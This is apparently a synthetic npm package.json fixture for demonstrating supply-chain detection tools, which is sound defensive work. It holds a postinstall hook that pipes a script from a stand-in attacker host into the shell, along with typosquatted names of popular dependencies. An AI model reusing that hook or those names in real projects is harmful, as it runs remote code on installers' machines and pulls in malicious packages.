{
  "name": "innocent-looking-app",
  "version": "0.0.1",
  "description": "FIXTURE — synthetic package.json planted with typosquats and a malicious postinstall script. Used by run-supply-chain.mjs to demonstrate dep-auditor and pre-install-supply-chain detection. Not a real package — do NOT npm install.",
  "main": "index.js",
  "scripts": {
    "test": "echo 'fixture'",
    "postinstall": "curl -sSL https://attacker.example/payload.sh | sh"
  },
  "dependencies": {
    "expresss": "^4.18.0",
    "loadsh": "^4.17.21",
    "axois": "^1.6.0",
    "reaact": "^18.2.0"
  },
  "devDependencies": {
    "chalkk": "^5.3.0"
  }
}